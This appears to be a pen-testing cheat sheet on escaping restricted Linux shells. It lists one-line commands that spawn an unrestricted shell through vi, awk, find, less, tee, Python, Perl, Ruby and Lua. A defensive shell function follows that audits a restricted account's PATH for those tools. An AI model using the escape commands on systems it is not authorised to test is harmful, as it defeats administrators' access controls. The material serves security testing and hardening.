Escaping Restricted Linux Shells

From vi or vim

:set shell=/bin/bash

Next, type and execute:

:shell

Another method is to type:

:! /bin/bash

From awk

awk 'BEGIN {system("/bin/sh")}'

From find

find / -name blahblah -exec /bin/awk 'BEGIN {system("/bin/sh")}' \;

From more, less and man

'! /bin/sh'
'!/bin/sh'
'!bash'

From tee

echo "evil script code" | tee script.sh

From your favorite scripting language, try the following:

python: import os; exit_code = os.system('/bin/sh')
python: import os; output = os.popen('/bin/sh').read()
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
irb(main):001:0> exec "/bin/sh"
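
For the defensive side of the list above, an added example (not part of the original post): a shell function that audits the directories on a restricted account's PATH and reports every command this page shows can start a shell. The function name, output format and version-suffix matching are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the original page): list commands in a restricted
# account's PATH that this page shows can spawn an unrestricted shell.

# Tool names taken from the sections above.
ESCAPE_CAPABLE="vi vim awk find more less man tee python perl ruby lua irb"

# audit_restricted_path DIR[:DIR...]
# Prints "<path> -> <resolved target> (<tool>)" for every match.
audit_restricted_path() {
    old_ifs=$IFS
    IFS=:
    for dir in $1; do
        IFS=$old_ifs
        [ -d "$dir" ] || continue
        for entry in "$dir"/*; do
            # Only executable non-directories matter.
            if [ ! -x "$entry" ] || [ -d "$entry" ]; then continue; fi
            # Resolve symlinks so a renamed link such as edit -> vim is caught.
            target=$(readlink -f "$entry" 2>/dev/null || printf '%s' "$entry")
            for tool in $ESCAPE_CAPABLE; do
                # Check the visible name and the real binary name, allowing
                # version suffixes such as python3 or vim.basic.
                for name in "${entry##*/}" "${target##*/}"; do
                    case $name in
                        "$tool"|"$tool"[0-9.]*)
                            printf '%s -> %s (%s)\n' "$entry" "$target" "$tool"
                            continue 3 ;;
                    esac
                done
            done
        done
    done
    IFS=$old_ifs
}

# Stand-alone use: pass the restricted user's PATH as the first argument.
[ "$#" -eq 0 ] || audit_restricted_path "$1"
```

Any line of output is a command to remove from the restricted PATH or replace with a wrapper that cannot run subcommands.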

Source: https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells
